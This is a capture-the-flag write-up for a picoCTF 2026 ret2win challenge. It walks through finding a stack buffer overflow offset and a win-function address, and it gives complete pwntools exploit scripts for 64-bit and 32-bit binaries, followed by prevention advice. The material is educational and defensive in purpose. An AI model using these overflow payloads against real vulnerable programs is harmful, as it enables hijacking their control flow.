offset-cycle picoCTF 2026 Solution

Published: March 20, 2026

Description

It's a race against time. Solve the binary exploit ASAP.

Launch the challenge instance and connect via SSH.

Download and analyse the provided files. The server gives you both a C source file and a compiled binary, so you can read the buffer size directly from the source without any disassembly.

Solution

  1. Step 1
    Reconnaissance
    Observation
    I noticed the challenge description warns the binary is regenerated per instance and there is only ~120 seconds to exploit it, which suggested scripting every step and running file vuln first to detect whether the binary is 32-bit or 64-bit before choosing p32 vs p64 and the correct register names.
    This challenge regenerates a fresh binary from a code bank on each instance and gives you only ~120 seconds to exploit it, so script everything and don't hand-edit offsets. Critically, the generated binary may be 32-bit OR 64-bit - run file vuln first and let the answer pick your tooling (p32/EIP/EBP vs p64/RIP/RBP). Then check protections and the interface.
    bash
    file vuln                       # 32-bit (ELF 32) or 64-bit (ELF 64)? decides p32 vs p64
    checksec vuln
    nc <HOST> <PORT_FROM_INSTANCE>
    objdump -d vuln | grep -A10 win

    Expected output

    vuln: ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked, not stripped
    What didn't work first

    Tried: Skip file vuln and assume 64-bit because most modern systems are 64-bit, then use p64() and RIP-based offsets throughout.

    The challenge explicitly randomises the binary between 32-bit and 64-bit on each instance. If the binary is 32-bit, p64() packs the wrong number of bytes, the payload length is off, and the return address lands in garbage. Running file vuln first costs one second and avoids a silent mismatch that produces a crash with no useful error.

    Tried: Use readelf -h vuln instead of file vuln to check the architecture.

    readelf works and would show the EI_CLASS field (ELFCLASS32 vs ELFCLASS64), but the output is verbose and requires reading the header fields manually. file vuln produces a single human-readable line like 'ELF 32-bit LSB executable' that is faster to parse under the 120-second timer and less error-prone.

    Learn more

    Check the architecture first. Because each instance ships a different binary, you cannot assume 64-bit. A 32-bit ELF uses 4-byte addresses, packs them with p32(), overflows through EBP into EIP, and has no 16-byte movaps alignment requirement; win addresses live in the 0x0804xxxx range. A 64-bit ELF uses 8-byte p64() addresses, overflows RBP into RIP, and may need a ret-gadget for stack alignment. Everything below is written for the 64-bit case; the final step shows the 32-bit variant.
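
The same check can live inside the exploit script, so one script adapts to whichever binary the instance hands out. The sketch below reads the ELF identification bytes with the standard library only; the names elf_bits and read_elf_bits are illustrative and not part of pwntools (with pwntools loaded, ELF("./vuln").bits reports the same thing).

```python
def elf_bits(header: bytes) -> int:
    """Return 32 or 64 based on the EI_CLASS byte of an ELF header."""
    if header[:4] != b"\x7fELF":
        raise ValueError("not an ELF file")
    ei_class = header[4]          # 1 = ELFCLASS32, 2 = ELFCLASS64
    if ei_class == 1:
        return 32
    if ei_class == 2:
        return 64
    raise ValueError(f"unknown EI_CLASS value {ei_class}")


def read_elf_bits(path: str) -> int:
    """Classify a file on disk by reading only its first five bytes."""
    with open(path, "rb") as f:
        return elf_bits(f.read(5))
```

Calling read_elf_bits("./vuln") at the top of the script and branching on the result (4-byte vs 8-byte addresses) removes one manual decision from the timed window.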

    checksec is a script that inspects a compiled binary for modern security mitigations. The key properties it reports are: NX (non-executable stack), PIE (position-independent executable, randomises base address), stack canaries (secret values that detect overflows), RELRO (read-only relocations, hardens GOT), and FORTIFY (compile-time and run-time checks on common buffer functions).

    For a basic ret2win challenge, the profile to look for is: NX enabled (shellcode on the stack is ruled out, but ret2win does not need it), no PIE or PIE with a leak (so the win address is predictable), and no stack canary (so you can overwrite the return address without detection). Understanding these protections upfront tells you exactly which exploit technique is applicable.

    • NX on, no canary, no PIE: classic ret2win with a fixed win address
    • NX on, no canary, PIE on: need an address leak first
    • NX off: shellcode injection is possible (see offset-cycleV2)
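
The three cases above can be written as a small decision helper for the exploit script. This is only a sketch of the triage described here: the function name pick_technique and its return strings are made up for illustration, and the canary branch restates the point that a canary detects a plain overflow.

```python
def pick_technique(nx: bool, canary: bool, pie: bool) -> str:
    """Map checksec results to the approach suggested in this writeup."""
    if canary:
        # A canary detects the overwrite before the function returns.
        return "canary present: a plain overflow is detected"
    if not nx:
        return "shellcode injection is possible"
    if pie:
        return "ret2win, but an address leak is needed first"
    return "classic ret2win with a fixed win address"
```

For the binary in this walkthrough (NX on, no canary, no PIE) the helper returns the classic ret2win case.
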
  2. Step 2
    Find the buffer overflow offset
    Observation
    I noticed the binary accepts user input into a fixed-size buffer with no length check, which suggested sending a De Bruijn cyclic pattern long enough to overflow the buffer and reading the unique bytes at RSP after the crash to pinpoint the exact padding length before the return address.
    The primary approach is to read the buffer size directly. The server provides the C source, so you can take the size straight from the array declaration; alternatively, disassemble the vuln function with objdump, where the sub esp/rsp instruction shows how much stack is reserved and the buffer's distance from EBP/RBP gives the exact layout. The padding is typically that distance plus the saved frame pointer (4 bytes on 32-bit, 8 on 64-bit). The cyclic/GDB approach below is a valid alternative but is not the primary intended route.
    python
    python3 -c "import sys; from pwn import *; sys.stdout.buffer.write(cyclic(200))" > pattern.txt
    bash
    # (print(cyclic(200)) would write the b'...' repr, not the raw pattern bytes.)
    # Crash inside GDB and inspect the stack interactively:
    gdb -q ./vuln
    (gdb) run < pattern.txt
    # When SIGSEGV hits, dump the stack to find the overflowing pattern:
    (gdb) x/s $rsp
    (gdb) x/16gx $rsp
    # Then plug the leaked bytes back into cyclic_find:
    python
    python3 -c "from pwn import *; print(cyclic_find(b'<value at rsp>'))"

    For a non-interactive run, chain the commands with -ex in batch mode: gdb -batch -ex 'run < pattern.txt' -ex 'bt' -ex 'x/8gx $rsp' ./vuln. GDB regains control when the program stops on the segfault and then executes the remaining -ex commands. If the program exits cleanly instead, there is no stack left to inspect, which means the pattern was too short. For interactive poking, drop the -batch and stay in the prompt after the crash.

    What didn't work first

    Tried: Inspect RIP directly after the crash with (gdb) info registers rip instead of dumping $rsp, then pass those bytes to cyclic_find().

    On x86-64, a ret to a non-canonical address faults on the ret instruction itself, so RIP is never loaded with the pattern bytes and info registers rip shows the address of the ret rather than the cyclic bytes. The 8 bytes that would have become the return address are still at the top of the stack, exactly where RSP points after the crash, so x/s $rsp or x/8gx $rsp is the correct place to read them.

    Tried: Generate a 200-byte cyclic pattern and send it to a 256-byte buffer, expecting the pattern to reach the return address.

    If the buffer is larger than the pattern, the return address is never reached and the program exits cleanly with no crash. The pattern must be long enough to overflow the buffer plus any saved frame pointer (typically buffer size + 8 on 64-bit). Use a pattern of at least 300 bytes as a safe starting point when the buffer size is unknown.

    Learn more

    A cyclic pattern (also called a De Bruijn sequence) is a string where every substring of length N appears exactly once. pwntools generates these with cyclic(length). When the program crashes, whatever 4 or 8 bytes ended up in the instruction pointer (RIP/EIP) or on the stack are a unique subsequence of the pattern - cyclic_find() instantly tells you the byte offset to that position.
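
To make the idea concrete, here is a pure-Python sketch of a cyclic pattern generator and lookup. It uses the standard recursive de Bruijn construction with a lowercase alphabet and subsequence length 4, which are also the pwntools defaults. The names pattern and pattern_find are illustrative stand-ins, not the pwntools API; use cyclic() and cyclic_find() in the real exploit.

```python
from itertools import islice
import string


def de_bruijn(alphabet: bytes, n: int):
    """Lazily yield a de Bruijn sequence over alphabet for subsequences of length n."""
    k = len(alphabet)
    a = [0] * (k * n)

    def db(t, p):
        if t > n:
            if n % p == 0:
                for j in range(1, p + 1):
                    yield alphabet[a[j]]
        else:
            a[t] = a[t - p]
            yield from db(t + 1, p)
            for j in range(a[t - p] + 1, k):
                a[t] = j
                yield from db(t + 1, t)

    return db(1, 1)


def pattern(length: int, n: int = 4) -> bytes:
    """First `length` bytes of the sequence; every n-byte window is unique."""
    return bytes(islice(de_bruijn(string.ascii_lowercase.encode(), n), length))


def pattern_find(needle: bytes, n: int = 4, limit: int = 20000) -> int:
    """Offset of the first n bytes of needle within the pattern, or -1."""
    return pattern(limit, n).find(needle[:n])
```

Passing the 8 bytes read at RSP works because only the first n bytes are needed to identify the position.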

    The offset you find is the number of bytes of padding needed before you start overwriting the saved return address. This is typically the local buffer size plus any saved frame pointer bytes above it. Understanding this precisely is critical: one byte too few and the return address isn't overwritten; one byte too many and you start overwriting the wrong things.
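
The sensitivity to a single byte is easy to see in a simulated stack frame. The sketch below assumes a hypothetical 64-bit frame with a 64-byte buffer followed directly by the saved RBP and the return address. Real compilers may add padding, so the real offset must still come from the source, the disassembly, or the cyclic pattern. All names and addresses are illustrative.

```python
import struct

BUF_SIZE = 64      # hypothetical local buffer size
SAVED_FP = 8       # saved RBP on 64-bit
RET_SLOT = BUF_SIZE + SAVED_FP   # offset of the saved return address (72)


def overflow(payload: bytes) -> bytearray:
    """Copy payload into a simulated frame: buffer | saved RBP | return address."""
    frame = bytearray(RET_SLOT + 8)
    frame[RET_SLOT:] = struct.pack("<Q", 0x401234)   # the legitimate return address
    n = min(len(payload), len(frame))
    frame[:n] = payload[:n]                          # unchecked copy, as in the bug
    return frame


def return_address(frame: bytearray) -> int:
    """Read back the 8-byte little-endian value in the return-address slot."""
    return struct.unpack_from("<Q", frame, RET_SLOT)[0]


def build_payload(offset: int, target: int) -> bytes:
    """Padding up to the return address, then the new address."""
    return b"A" * offset + struct.pack("<Q", target)
```

With the correct offset of 72 the slot holds the target address exactly; with 71 or 73 the slot holds a shifted, meaningless value.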

    Alternative methods: disassemble the function to find the sub rsp, X instruction that allocates the buffer (Ghidra is great for this, see the Ghidra reverse engineering post), use the pattern commands provided by GDB extensions such as GEF or pwndbg, or read the C source provided with the instance. For deeper GDB workflow tips, see the GDB for CTF guide; for the broader stack-overflow background, see Buffer overflow exploitation for CTF.

  3. Step 3
    Locate the win function address
    Observation
    I noticed the checksec output showed no PIE, meaning the binary loads at a fixed base address every run, which suggested the win function address found via objdump or pwntools ELF symbol lookup would be stable and usable directly in the payload without any runtime leak.
    Find the address of the win/flag function using objdump or pwntools ELF.
    bash
    objdump -d vuln | grep '<win>'    # binary may be named '32' or 'vuln' depending on server
    bash
    # e.g.: objdump -D 32 | grep win
    python
    python3 -c "from pwn import *; e=ELF('./vuln'); print(hex(e.sym['win']))"
    What didn't work first

    Tried: Use objdump -d vuln | grep '<flag>' to find the win function, because some versions call it 'flag' instead of 'win'.

    The binary name and function name both vary per instance. Grepping for a single name such as '<win>' or '<flag>' misses the alternatives other instances use, like 'give_flag' or 'print_flag'. The pwntools lookup e.sym['win'] fails in the same way if the symbol has a different name. The most robust method is objdump -d vuln | grep -E '<(win|flag|give_flag|print_flag)>' or iterating e.symbols to find any non-standard function near main.

    Tried: Hard-code the win address from a previous run (e.g. 0x401196) and skip the objdump step on subsequent attempts.

    Each challenge instance regenerates a fresh binary from a code bank, so the win function address changes between instances. A hard-coded address from a previous session will either point to arbitrary instructions or trigger a segfault. Always resolve the address dynamically via e.sym['win'] or re-run objdump on the current instance's binary.

    Learn more

    In a ret2win challenge, there is a function in the binary (often called win, flag, give_flag, or similar) that prints the flag but is never called in normal program flow. Your goal is to redirect execution to it by overwriting the return address.

    objdump -d disassembles the binary and shows the address of every function. pwntools' ELF class parses the binary's symbol table and lets you look up addresses by name with e.sym['win']. When PIE is disabled, these addresses are fixed and valid without any runtime leak.
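
Because the function name can vary between instances, the lookup is worth scripting. The sketch below scans objdump -d output for function label lines of the form "address <name>:" and returns the first match from a list of candidate names. The candidate list and the helper name find_win are assumptions for illustration; extend the list if an instance uses a different name.

```python
import re

CANDIDATES = ("win", "flag", "give_flag", "print_flag")   # assumed name variants

# objdump prints one label line per function, e.g. "0000000000401196 <win>:"
LABEL = re.compile(r"^([0-9a-fA-F]+) <([^>]+)>:\s*$")


def find_win(objdump_text: str, names=CANDIDATES):
    """Return (name, address) for the first candidate function found, else None."""
    for line in objdump_text.splitlines():
        match = LABEL.match(line)
        if match and match.group(2) in names:
            return match.group(2), int(match.group(1), 16)
    return None
```

The input can come from subprocess.run(["objdump", "-d", "vuln"], capture_output=True, text=True).stdout, so the address is always resolved from the current instance's binary.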

    In 64-bit Linux, return addresses are 8 bytes and stored little-endian. pwntools' p64(address) function converts an integer address to the correct 8-byte little-endian representation ready to paste into your payload.
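
For reference, the packing itself is plain little-endian encoding. The sketch below reproduces it with the standard struct module; pack64 and pack32 are illustrative names that mirror what p64() and p32() produce, and both addresses are example values only.

```python
import struct


def pack64(addr: int) -> bytes:
    """8-byte little-endian encoding, as used for 64-bit return addresses."""
    return struct.pack("<Q", addr)


def pack32(addr: int) -> bytes:
    """4-byte little-endian encoding, as used for 32-bit return addresses."""
    return struct.pack("<I", addr)


print(pack64(0x401196).hex())     # least significant byte comes first
print(pack32(0x08049196).hex())
```

The length difference (8 bytes vs 4) is why using the wrong packer shifts everything after the padding.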

  4. Step 4
    Build and send the payload
    Observation
    I noticed that on 64-bit glibc binaries the win function calls puts or printf, both of which use SSE movaps instructions that require RSP to be 16-byte aligned at call time, which suggested inserting a bare ret gadget before the win address to flip the alignment without disturbing any registers.
    Run the exploit without an alignment gadget first. If you crash with SIGSEGV inside a movaps instruction in win() or _IO_*, then add a single ret gadget before the win address to flip the 16-byte alignment.
    bash
    # Find a RET gadget for alignment if needed:
    bash
    ROPgadget --binary vuln | grep ': ret$'
    What didn't work first

    Tried: Skip the ROPgadget step and just send the payload directly to win, assuming alignment issues only matter for libc functions and not a simple win() that calls puts().

    puts() and printf() can execute SSE instructions such as movaps inside glibc on x86-64. If win() calls either with a misaligned stack, the process crashes before any output appears. The alignment gadget costs only 8 bytes of payload, so look up its address up front; skipping the lookup on a guess wastes part of the ~120-second window on a retry.

    Tried: Use a pop rdi; ret gadget instead of a bare ret to fix alignment, since pop rdi is a common first ROP gadget.

    A pop rdi; ret gadget pops an extra 8-byte value into RDI before it returns, so its address must be followed by a dummy slot; without one, the win address itself is popped into RDI and execution returns to whatever follows it. Even with the dummy slot, the gadget moves RSP by 16 bytes in total, which leaves the alignment exactly as it was. A bare ret (a single-byte instruction) moves RSP by exactly 8 and touches no registers, which is what flips the alignment.

    Learn more

    The stack alignment issue is a common stumbling block in 64-bit ret2win exploits. The x86-64 System V ABI requires that RSP be 16-byte aligned at the moment a call instruction executes (so at function entry, after call has pushed the 8-byte return address, RSP sits 8 bytes past a 16-byte boundary). Some functions use SSE instructions like movaps that crash with a SIGSEGV if the stack is misaligned.

    The fix is to insert an extra single-byte ret gadget before the win address in your payload. A bare ret pops 8 bytes off the stack and returns, adjusting RSP by 8 - this flips the alignment from misaligned to properly aligned before the win function's prologue runs.
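
The alignment flip is simple modular arithmetic. The sketch below tracks RSP modulo 16 from the hijacked return up to the first instruction of win. It assumes the vulnerable function was itself entered through a normal call with a correctly aligned stack; the function name and the slot-counting model are illustrative.

```python
ALIGNED_ENTRY = 8   # RSP % 16 at the entry of a normally called function


def rsp_mod16_at_win(extra_slots: int) -> int:
    """RSP % 16 on entry to win after a hijacked return.

    extra_slots counts the 8-byte stack slots consumed by gadgets placed
    before the win address: 0 = none, 1 = bare ret, 2 = pop rdi; ret plus
    its dummy value.
    """
    rsp = ALIGNED_ENTRY        # the saved return address sits where RSP was at entry
    rsp += 8 * extra_slots     # gadget addresses and popped values
    rsp += 8                   # the ret that finally pops the win address
    return rsp % 16
```

With no gadget the result is 0, so win starts 8 bytes off from what a normal call would produce. One bare ret gives 8, matching ALIGNED_ENTRY. A two-slot gadget returns to 0, which is why pop rdi; ret does not help here.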

    ROPgadget and ropper are tools that scan binaries for short instruction sequences ending in ret, called ROP (Return-Oriented Programming) gadgets. Even for this simple challenge, the single-byte ret gadget is your first ROP gadget. More complex exploits chain dozens of these to build arbitrary computation.

  5. Step 5
    Exploit script
    Observation
    I noticed the previous steps produced three concrete values (the offset, the win address, and the optional ret gadget address), which suggested assembling them into a single pwntools script using sendlineafter to synchronise with the server prompt and avoid timing issues over the remote connection.
    Full pwntools exploit. The RET gadget is only needed if you see a crash inside win() at a movaps instruction.
    python
    python3 - <<'EOF'
    from pwn import *
    
    HOST, PORT = "<HOST>", <PORT_FROM_INSTANCE>
    e = ELF("./vuln")
    
    OFFSET   = <offset>          # found with cyclic
    WIN      = e.sym["win"]      # address of win/flag function
    RET_GADGET = <ret_addr>      # optional: one-byte RET for 16-byte alignment
    
    payload  = b"A" * OFFSET
    payload += p64(RET_GADGET)   # remove this line if alignment isn't needed
    payload += p64(WIN)
    
    r = remote(HOST, PORT)
    r.sendlineafter(b":", payload)
    r.interactive()
    EOF

    If file vuln reported a 32-bit ELF (as the random binary often is), switch to the 32-bit packer and drop the alignment gadget entirely - 32-bit has no movaps issue:

    from pwn import *
    
    e = ELF("./vuln")
    OFFSET = <offset>          # 32-bit: buffer size + 4 (the saved EBP)
    WIN    = e.sym["win"]      # 32-bit win lands around 0x0804xxxx
    
    payload  = b"A" * OFFSET
    payload += p32(WIN)        # 4-byte little-endian, no ret-gadget needed
    
    r = remote("<HOST>", <PORT_FROM_INSTANCE>)
    r.sendlineafter(b":", payload)
    r.interactive()
    What didn't work first

    Tried: Use r.sendline(payload) instead of r.sendlineafter(b':', payload) to avoid having to know the exact prompt string.

    Without sendlineafter, pwntools sends the payload immediately, before the prompt has arrived. Early bytes are normally buffered until the program reads them, so the symptom is rarely a corrupted payload; the real cost is that the script no longer tracks the program's state. If the service prints a banner, asks an earlier question, or is slow to start, the payload can land in the wrong read, and the failure looks like a clean exit instead of a segfault. sendlineafter confirms the prompt was reached before anything is sent.

    Tried: Run the exploit script locally against ./vuln using process('./vuln') first to confirm it works, then switch to remote() for the server.

    Local testing is good practice in general, but this challenge regenerates a new binary for each SSH session. If you test with a locally downloaded binary and then the server spins up a new instance, the binary (and therefore the offset and win address) may differ. Always re-download the binary from the live instance and re-derive the offset and win address before sending the remote exploit.

    Learn more

    pwntools is the standard Python library for binary exploitation CTF challenges. It provides: remote(host, port) for connecting to servers, ELF for parsing binaries, p64()/p32() for packing addresses, cyclic()/cyclic_find() for offset discovery, and interactive() for dropping into an interactive shell session once exploitation succeeds.

    The sendlineafter(b":", payload) pattern waits until the program outputs a colon (the input prompt) before sending your payload. This synchronisation is important for remote exploits where network latency means you can't just blindly send data immediately.
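
Under the hood this is a receive-until-delimiter loop followed by a send. The sketch below shows the idea on a raw socket with the standard library; recv_until and send_line_after are illustrative names, not pwntools functions, and the "Enter input: " prompt in the usage note is a made-up example.

```python
import socket


def recv_until(sock: socket.socket, delim: bytes) -> bytes:
    """Read one byte at a time until the received data ends with delim."""
    data = b""
    while not data.endswith(delim):
        chunk = sock.recv(1)
        if not chunk:
            raise EOFError("connection closed before the delimiter arrived")
        data += chunk
    return data


def send_line_after(sock: socket.socket, delim: bytes, payload: bytes) -> bytes:
    """Wait for delim, then send payload plus a newline; return what was read."""
    seen = recv_until(sock, delim)
    sock.sendall(payload + b"\n")
    return seen
```

If the service prints "Enter input: ", calling send_line_after(sock, b":", payload) returns b"Enter input:" and only then transmits the payload, which is the ordering sendlineafter gives you.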

    The r.interactive() call at the end hands control of stdin/stdout to your terminal, letting you type commands in the spawned shell or read output. In a ret2win challenge the flag is printed automatically, but interactive() is still useful to confirm the output and debug failures.

Interactive tools
  • Cyclic Pattern Generator: Generate de Bruijn cyclic patterns and find buffer overflow offsets. The browser equivalent of pwntools cyclic and cyclic_find.
  • pwntools Payload Builder: Pack integers into little-endian bytes (p32 / p64), unpack bytes back to integers, and build flat ROP payloads with offset-based insertion.

Flag

picoCTF{0ff53t_cycl3_...}

ret2win buffer overflow against a per-instance binary on a ~120s timer, so script it. Run `file vuln` first: 32-bit uses p32 + a 0x0804xxxx win address with no alignment gadget; 64-bit uses p64 and may need a RET gadget to fix movaps stack alignment. Find the offset with a cyclic pattern and locate win with objdump/pwntools.

Key takeaway

Stack buffer overflows succeed because C gives functions a flat region of memory for local variables, and writing past that region silently overwrites adjacent stack data including the saved return address. A ret2win attack simply redirects that saved address to a function that already exists in the binary, requiring no injected code at all. The same read-the-binary-then-overwrite-return-address primitive underlies more advanced techniques like ROP chains, and the defense is always the same: bounds-check every write and enable compiler stack protection.

How to prevent this

ret2win is the simplest stack overflow primitive. Any one of the standard mitigations breaks it.

  • Replace unbounded reads with bounded ones: fgets(buf, sizeof(buf), stdin), never gets() or scanf("%s", buf). The compiler warns about gets; treat the warning as an error.
  • Compile with -fstack-protector-strong. The canary detects the overflow before ret executes and aborts. Negligible runtime cost, near-perfect coverage for this bug class.
  • Don't ship a win() function that reads /flag. CTF binaries do this for educational purposes; production code should never have an "unlock everything" function reachable from a return-address overwrite.
